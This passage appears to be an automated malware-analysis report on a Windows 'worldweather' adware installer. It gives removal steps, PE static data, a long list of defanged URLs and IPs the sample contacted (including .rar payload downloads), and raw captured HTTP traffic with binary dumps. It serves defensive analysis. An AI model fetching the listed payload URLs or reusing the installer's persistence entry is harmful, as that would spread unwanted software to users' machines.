%Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\nsRandom.dll (935 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: MeinV
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: Installer Application
Comments: http://hh8.xjtj.org
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 81920 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 274432 | 226616 | 226816 | 4.99531 | e4507cfd24e349a1798e0ce96876409d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://lm.beilequ.com/update/365/365weatherIns_61.rar | 122.225.100.200 |
hxxp://lvdou.300duo.com/favicon.ico | 223.255.145.200 |
hxxp://lvdou.300duo.com/ | 223.255.145.200 |
hxxp://proxy.sogou.com/?22014 | |
hxxp://njsh.cdn.sogou.com/kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= | |
hxxp://proxy.sogou.com/css/skin_.css?V=cr | |
hxxp://njsh.cdn.sogou.com/imgn/v32/icon4.gif | |
hxxp://njsh.cdn.sogou.com/imgn/v32/selogo_111207.png | |
hxxp://njsh.cdn.sogou.com/v53/imgn/v53_2icos.gif | |
hxxp://proxy.sogou.com/v53/jsn/v53_123n.js?V=cr | |
hxxp://njsh.cdn.sogou.com/imgn/v32/skin3.gif | |
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/subnav_v41.png | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140508103513_537.gif | |
hxxp://njsh.cdn.sogou.com/imgn/v32/skin2_0.gif | |
hxxp://njsh.cdn.sogou.com/v53/imgn/v53_bicos.gif | |
hxxp://njsh.cdn.sogou.com/v53/imgn/v53_arrow_h.gif | |
hxxp://njsh.cdn.sogou.com/imgu/2013/05/20130531144119_126.png | |
hxxp://njsh.cdn.sogou.com/imgn/123ie/search_arrow.gif | |
hxxp://njsh.cdn.sogou.com/imgn/123ie/setting_icon.gif | |
hxxp://njsh.cdn.sogou.com/imgu/2013/08/20130820165531_481.gif | |
hxxp://njsh.cdn.sogou.com/v53/imgn/foot_slider.jpg | |
hxxp://proxy.sogou.com/dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1399956568915 | |
hxxp://njsh.cdn.sogou.com/ads_hz/_ads_2.js?t=777753 | |
hxxp://njsh.cdn.sogou.com/imgn/v32/titlebg.png | |
hxxp://proxy.sogou.com//v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1399956570478&method=ajaf&cbf=fn | |
hxxp://proxy.sogou.com/jsn/hotdata.js?V=1399956570493 | |
hxxp://njsh.cdn.sogou.com/imgn/v32/fbg_about.png | |
hxxp://njsh.cdn.sogou.com/imgn/tips/lk_jumei.png | |
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570071&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=62 | |
hxxp://njsh.cdn.sogou.com/u/js/ufo2.js | |
hxxp://njsh.cdn.sogou.com/jsn/v33_sugg_ajaj_v40_3.js | |
hxxp://njsh.cdn.sogou.com/jsn/citydata.js | |
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1399956570103&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=风云无åÂÅ’_仙侠é“_暗黑屠龙_Sogou傲剑2_万世_大闹天宫OL | |
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=daohang&rdk=1399956570493&img=pv.gif&pars=?rand=1399956570493&suid=null&sduv=1399956570462_5852_00001&ckid=6846_00001_00000_3030_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_cr__4&sys=100&ser=null&sev=null&time=3531 | |
hxxp://njsh.cdn.sogou.com/imgn/tips/skin_tips_n1.gif | |
hxxp://njsh.cdn.sogou.com/imgn/v32/setskinbg.gif | |
hxxp://proxy.sogou.com/images/weather/cloudy.gif | |
hxxp://proxy.sogou.com/images/weather/fine_cloudy.gif | |
hxxp://sj88.www.web.glb0.ldcache.net/hezi/jm/setup_a7158.rar | |
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/tongji/tongji_61.html | 122.225.104.211 |
hxxp://njsh.cdn.sogou.com/imgn/v51/new-erweima2.png | |
hxxp://njsh.cdn.sogou.com/v53/jsn/main.js?V=16bb90f6b3db269d3b0dadfb85d67a51a | |
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570087&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=172 | |
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1399956575900&refer=&page=æÂœç‹—网å€导航ï¼Âï¼Â网å€大全,实çâ€Â¨Ã§Â½â€˜Ã¥Â€,尽在123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 | |
hxxp://proxy.sogou.com/v53/get_tj.php?hz=4666521&ids=qiche | |
hxxp://njsh.cdn.sogou.com/v53/imgn/guide_tip.png | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140507144124_693.jpg | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140512170407_319.jpg | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140513112717_7.jpg | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140512112800_851.jpg | |
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/new-ico.png | |
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/img-news.gif | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140512170546_833.jpg | |
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140507144656_823.jpg | |
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/img-video-2.gif | |
hxxp://njsh.cdn.sogou.com/imgn/v51/i-ico-2b.png | |
hxxp://save2.xdwscache.glb0.lxdns.com/img/news_photo/2014/05/12/fIXLig2wT89333.jpg | |
hxxp://njsh.cdn.sogou.com/imgn/v32/logo_1112293.gif | |
hxxp://save2.xdwscache.glb0.lxdns.com/img/news_photo/2014/05/12/1oq9Gg9Y3L8813.jpg | |
hxxp://weather51la.cnzz.alivcd.com/post/ | 122.225.104.211 |
hxxp://proxy.sogou.com/favicon.ico | |
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/weatherPng/cnzz.html | 122.225.104.211 |
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html | 122.225.104.211 |
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml | 122.225.104.211 |
hxxp://int.dpool.sina.com.cn/iplookup | 123.125.29.252 |
hxxp://int.dpool.sina.com.cn/iplookup/ | 123.125.29.252 |
hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/new-ico.png | 58.215.147.36 |
hxxp://p0.123.sogoucdn.com/imgu/2014/05/20140512112800_851.jpg | 222.211.87.167 |
hxxp://d.123.sogoucdn.com/v53/imgn/v53_bicos.gif | 114.80.179.224 |
hxxp://p9.123.sogoucdn.com/imgu/2014/05/20140507144656_823.jpg | 114.80.179.222 |
hxxp://pic1.xcarimg.com/img/news_photo/2014/05/12/1oq9Gg9Y3L8813.jpg | 222.84.167.30 |
hxxp://d.123.sogoucdn.com/ads_hz/_ads_2.js?t=777753 | 114.80.179.224 |
hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/img-news.gif | 58.215.147.36 |
hxxp://p7.123.sogoucdn.com/imgu/2014/05/20140513112717_7.jpg | 58.215.147.42 |
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html | 122.225.104.211 |
hxxp://p6.123.sogoucdn.com/imgu/2013/08/20130820165531_481.gif | 58.215.147.38 |
hxxp://p0.123.sogoucdn.com/imgn/v32/skin3.gif | 222.211.87.167 |
hxxp://d.123.sogoucdn.com/v53/imgn/v53_2icos.gif | 114.80.179.224 |
hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/img-video-2.gif | 58.215.147.36 |
hxxp://123.sogou.com/favicon.ico | 106.120.151.64 |
hxxp://www.sj88.com/hezi/jm/setup_a7158.rar | 202.97.174.78 |
hxxp://p0.123.sogoucdn.com/imgn/v32/titlebg.png | 222.211.87.167 |
hxxp://p6.123.sogoucdn.com/imgn/123ie/setting_icon.gif | 58.215.147.38 |
hxxp://d.123.sogoucdn.com/v53/imgn/guide_tip.png | 114.80.179.224 |
hxxp://p1.123.sogoucdn.com/imgn/v32/skin2_0.gif | 222.211.87.171 |
hxxp://123.sogou.com/images/weather/cloudy.gif | 106.120.151.64 |
hxxp://123.sogou.com//v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1399956570478&method=ajaf&cbf=fn | 106.120.151.64 |
hxxp://123.sogou.com/v53/jsn/v53_123n.js?V=cr | 106.120.151.64 |
hxxp://img.users.51.la/15909623.asp | 117.21.191.223 |
hxxp://p4.123.sogoucdn.com/imgn/v32/fbg_about.png | 114.80.179.226 |
hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570087&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=172 | 106.120.151.49 |
hxxp://123.sogou.com/?22014 | 106.120.151.64 |
hxxp://d.123.sogoucdn.com/v53/imgn/v53_arrow_h.gif | 114.80.179.224 |
hxxp://d.123.sogoucdn.com/imgn/v32/icon4.gif | 114.80.179.224 |
hxxp://123.sogou.com/jsn/hotdata.js?V=1399956570493 | 106.120.151.64 |
hxxp://p0.123.sogoucdn.com/u/js/ufo2.js | 222.211.87.167 |
hxxp://p3.123.sogoucdn.com/imgn/v51/i-ico-2b.png | 58.215.147.36 |
hxxp://p5.123.sogoucdn.com/imgn/v32/logo_1112293.gif | 222.211.87.185 |
hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570071&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=62 | 106.120.151.49 |
hxxp://d.123.sogou.com/jsn/v33_sugg_ajaj_v40_3.js | 114.80.179.210 |
hxxp://p8.123.sogoucdn.com/imgn/tips/skin_tips_n1.gif | 222.211.87.163 |
hxxp://p2.123.sogoucdn.com/imgu/2014/05/20140507144124_693.jpg | 58.215.147.40 |
hxxp://123.sogou.com/images/weather/fine_cloudy.gif | 106.120.151.64 |
hxxp://123.sogou.com/v53/get_tj.php?hz=4666521&ids=qiche | 106.120.151.64 |
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/weatherPng/cnzz.html | 122.225.104.211 |
hxxp://123.sogou.com/css/skin_.css?V=cr | 106.120.151.64 |
hxxp://p3.123.sogoucdn.com/imgn/v32/setskinbg.gif | 58.215.147.36 |
hxxp://wan.sogou.com/dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1399956568915 | 106.120.151.65 |
hxxp://p9.123.sogoucdn.com/imgu/2014/05/20140512170546_833.jpg | 114.80.179.222 |
hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1399956575900&refer=&page=æÂœç‹—网å€导航ï¼Âï¼Â网å€大全,实çâ€Â¨Ã§Â½â€˜Ã¥Â€,尽在123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 | 106.120.151.49 |
hxxp://p0.123.sogoucdn.com/imgn/sehome/tjv1/subnav_v41.png | 222.211.87.167 |
hxxp://p4.123.sogoucdn.com/imgn/v32/selogo_111207.png | 114.80.179.226 |
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml | 122.225.104.211 |
hxxp://p8.123.sogoucdn.com/imgn/v32/selogo_111207.png | 222.211.87.163 |
hxxp://pic4.xcarimg.com/img/news_photo/2014/05/12/fIXLig2wT89333.jpg | 222.84.167.30 |
hxxp://p0.123.sogou.com/imgn/tips/lk_jumei.png | 1.100.192.15 |
hxxp://p4.123.sogoucdn.com/imgu/2014/05/20140508103513_537.gif | 114.80.179.226 |
hxxp://d.123.sogou.com/jsn/citydata.js | 114.80.179.210 |
hxxp://p7.123.sogoucdn.com/imgn/123ie/search_arrow.gif | 58.215.147.42 |
hxxp://p3.123.sogoucdn.com/imgn/v51/new-erweima2.png | 58.215.147.36 |
hxxp://d.123.sogoucdn.com/v53/imgn/foot_slider.jpg | 114.80.179.224 |
hxxp://p8.123.sogoucdn.com/imgu/2014/05/20140512170407_319.jpg | 222.211.87.163 |
hxxp://p1.123.sogoucdn.com/imgn/v32/selogo_111207.png | 222.211.87.171 |
hxxp://d.123.sogoucdn.com/v53/jsn/main.js?V=16bb90f6b3db269d3b0dadfb85d67a51a | 114.80.179.224 |
hxxp://www.xzsky.com/post/ | 122.225.104.211 |
hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1399956570103&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=风云无åÂÅ’_仙侠é“_暗黑屠龙_Sogou傲剑2_万世_大闹天宫OL | 106.120.151.49 |
hxxp://pb.sogou.com/pv.gif?uigs_productid=daohang&rdk=1399956570493&img=pv.gif&pars=?rand=1399956570493&suid=null&sduv=1399956570462_5852_00001&ckid=6846_00001_00000_3030_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_cr__4&sys=100&ser=null&sev=null&time=3531 | 106.120.151.49 |
hxxp://p2.123.sogoucdn.com/imgu/2013/05/20130531144119_126.png | 58.215.147.40 |
hxxp://d.123.sogoucdn.com/kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= | 114.80.179.224 |
vipimg.51.la | 182.236.163.41 |
weather.uujzy.com | 122.225.203.94 |
www.biso.cc | 67.198.240.190 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1399956568915 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wan.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 374
Connection: keep-alive
Set-Cookie: SSUID=E7F48AC1243DE19807397E1A09B09599; expires=Mon, 08-May-34 04:49:24 GMT; path=/
Set-Cookie: IPLOC=UA; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
__yx2q([{"gid":"212","title":"............","source":"0011000100006"},{"gid":"181","title":".........","source":"0011000100007"},{"gid":"177","title":"............","source":"0011000100008"},{"gid":"215","title":"Sogou......2","source":"0011000100009"},{"gid":"178","title":"......","source":"0011000100010"},{"gid":"86","title":"............OL","source":"0011000100011"}])
GET /imgn/v32/logo_1112293.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p5.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:33 GMT
Content-Type: image/gif
Content-Length: 4512
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:33 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..B...................................J}.v....._.,..;..-a.5m.J..Z..R..x..`....................................`..]..]..[..Y..V..R..N..M~.Iy.Eq.Bm.[..f.._..O..a..V..\..Kw.Is.d..T..Rx'g.V..i..Mz.k..w...........................w..s..q..o..l..l..i..f..b..]..Ly.Hs.~..u..s..d.._..P|.Z..y..u..i..^.....|..r..u..o..k..e..\..a..Ox.h.....X.....{..j.(..#\~4y.K..:w.4j.E..S..W..p..|.....w...................................................z..h..e.....o.....y...........y.&..(..(..!p.&y.5..=..=..<..;..<..D..G..;..C..B..J..A..;..O..N..L..O..S..S..L..Y..Y..R..D..<q.^..a..h..f..e..{..^...........................................................................................................................................................................................................!.......,......B........H......*\......#J.H.....3j...... C..I....(S.\.....".i.G..Mr..M...g.k.....n.......'/.7.P.>.....o..q..u .s....&.......;...8......5..t...t9....e......8.p..mVh@.n..}[7.\....H....@....47o]9r...}..[..6X.^A...n...........|x....../.F.N..rG..[.721.-d...B...1t..1....vOU&p........x...r.... ........Cv,....8....3........:.|....-....I..}%...9.X.C8Yq..8=....).0....p..'.!D8..C.6.%.C..e.!|...Cf.T0.. .$.9.P..1[m......Bl H...g.p..hF...y...;{9t..C...r.%..{L...@Kf.!..T@d...#.9....7.h#.....B.b.p..g`!..i\q..W.Q..o...4.}(...L.0.p..I..u.D...h....JpA.G.z(..Y3O:...@..H..........@...>...c8!n.d....b=.a..2...C...? .......A....lE..c.01(`A..b3-6..CGv .0..%`...N0.....1..w...9......*.Y. `.Y.C.....}..{..g.p.R.....t...}.$A T`.D..S..:(....\c56
<<
<<< skipped >>>
GET /imgn/v32/skin2_0.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p1.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 592
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..........Ly.Ky.Aq.Et.Iw.S..W..Z..[..a..d..c..e..g..w...................................s..............................................................................................................................................................................................................................................................................................................!.....s.,............s.s...s ..................)q(....&X*....#qnmol!!p<Pad%..$igbf`ch\OYIQ"...rlj_^]PMK/U:..s...pe[ZJG7'......kNLH6CF*....W.EB35-..s.............B$...=~.HX...*8...... ..B...`..@.;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:23 GMT..Content-Type: image/gif..Content-Length: 592..Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:23 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a..........Ly.Ky.Aq.Et.Iw.S..W..Z..[..a..d..c..e..g..w...................................s..............................................................................................................................................................................................................................................................................................................!.....s.,............s.s...s ..................)q(....&X*....#qnmol!!p<Pad%..$igbf`ch\OYIQ"...rlj_^]PMK/U:..s...pe[ZJG7'......kNLH6CF*....W.EB35-..s.............B$...=~.HX...*8...... ..B...`..@.;..
<<
<<< skipped >>>
GET /cnzz/weather/5.0.0.5002/tongji/tongji_61.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: weather51la.cnzz.alivcd.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Fri, 21 Mar 2014 05:47:34 GMT
Connection: keep-alive
ETag: "532bd276-2"
Accept-Ranges: bytes
OKHTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:30 GMT..Content-Type: text/html..Content-Length: 2..Last-Modified: Fri, 21 Mar 2014 05:47:34 GMT..Connection: keep-alive..ETag: "532bd276-2"..Accept-Ranges: bytes..OK..
GET /imgn/v32/selogo_111207.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p8.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 12155
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /?22014 HTTP/1.1
User-Agent: ...............
Connection: Keep-Alive
Host: 123.sogou.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:17 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
90c9................\.u/...gb!..=......`v..X........7.2....12N>6.A ....@ @...$.yy...G.;..b...~.sj.Uw..I..21..[.T..sN..N......{....$..V3...{.~p_b"9=.......O.O|....y8.I..O..v.1ht.Nsz.......`.]..^[[K..R.^m..'......,?&......2.|?...]..|..1h..W>:}..g.N.<..........W~.......y..L.;..O3.\...u..r.u..x...;p0.A7...6V.&..|zOr_..u..R..H.;....,M<x`.@k.t....f'.................`...X.;..;X..V0.........w}......0.)=.)5...?...............s.....N......n....v..............g.....3ZN.....}...M..t......8y..o..z.....x..H?{s.c...r...u....U..............{.....o.A.{.....#....^.y....^?v........}..K.~|...?<.W....[.....7....O....s?....?...g..._...7....4HB..?|.o...............;......n....c..$...J..6.&.X..D..V.&..-......*....&...[.y<.....8}4.....hI...x..;......U.....K.....B.]K...........-|.Z\k. ...j!..^..Z..|....C.j.....?....u3....K..*)M8.J..~z.iO.. ..t......Xr.. .?..b:.N.9.V..:...Z_..`N.....'Um..y_........8ht...}..CZ5R..f).Y5.-..1.!.V...V..V-....~5lo._:.. ...%.@.`........&.K....35lN5.S..T.......zv....N...j...j....T.m...T..e....*..Je.mm..^..^Hw..v.J.....-'...%........-g..ivz...*.-..' n...Bv.....Yn.No.......D...l..I...Y.6;.`..V.[.l.e_&A3..}...{.Z}...zne.I...I..Q.W<..\.....B.....s..-J.. ...[...P......0..Eh.,9..Z.._.&....59.v.Q...,......,....Uwq#..r....V!..........4HL|m...T...V.m.5*..B&.......G{k..*...2%..A.....M.;.F%1Y...bW..)..p`.f.....z......j>.).?i..#..3.t 4h..3.....K... 6y2.E.E.?.......09(.M...@..a..RkT..C.-..V.....;...~7..O ...j.;._i.s)..oW..I..........>...F..t..J.NyE""W0.M8..H?x..&A.O..e.4......1.,.h..a.........M...
<<
<<< skipped >>>
GET /css/skin_.css?V=cr HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:22 GMT
Content-Type: text/css
Content-Length: 21
Connection: keep-alive
Last-Modified: Tue, 20 Sep 2011 09:23:40 GMT
ETag: "4e785b9c-15"
Expires: Wed, 14 May 2014 11:53:00 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
/* skin default */...HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:22 GMT..Content-Type: text/css..Content-Length: 21..Connection: keep-alive..Last-Modified: Tue, 20 Sep 2011 09:23:40 GMT..ETag: "4e785b9c-15"..Expires: Wed, 14 May 2014 11:53:00 GMT..Cache-Control: max-age=259200..Accept-Ranges: bytes../* skin default */.......
GET /v53/jsn/v53_123n.js?V=cr HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: application/x-javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Thu, 08 May 2014 05:03:36 GMT
Expires: Wed, 14 May 2014 11:54:27 GMT
Cache-Control: max-age=259200
Content-Encoding: gzip
5206..............y...u/.U.).U......zC.....y..'R>......U...P...f.. ....(.'..ls...;@...........).I.{.dK.d...nDdFVU....3sHtel7"nD..q....q.....\.W.....vm4wW.9h.{^?...._g...].&..@........$t'C........v.;.*.......(L;.?.p........._..w.?.d..g[.%Hg.G^8...Z.n........_8....z....~...|$............?N..sv.`.......^..xsN.\t.....Y..........."%.....w.....o.=...u`c...0.[=f6....G......~....`T....N...o%.x......`..{.vk.....*...A..E\I.B.}...P#.....`g0j....$`p....C.Dg.>.j[.....dw...v.m...Y51..|.L....y..V...9.B4{..%....b..G......]....6.u..".9..D.{!......`';.z.......@.*z"..6..X.o...C.#........;..xT..3...X..[i'..?v.}w=...w\.f.....r.wG1wG>..eL....qu...H ..j..*.a"....sYo.6k&.F!...i.....o.kh.*.:.Y..."....5s........f.15....."S6../.|...%..L..WJ0..'..V..1...,..>.z1..j. %. f..~........s6znF.zS......X..?........p8t...VD.....n.4.'.F"j.a....c......K.N...'P......H..R...n.tb4.../._..Vr.....m.K..B.Xj,/........\X.7...r.. 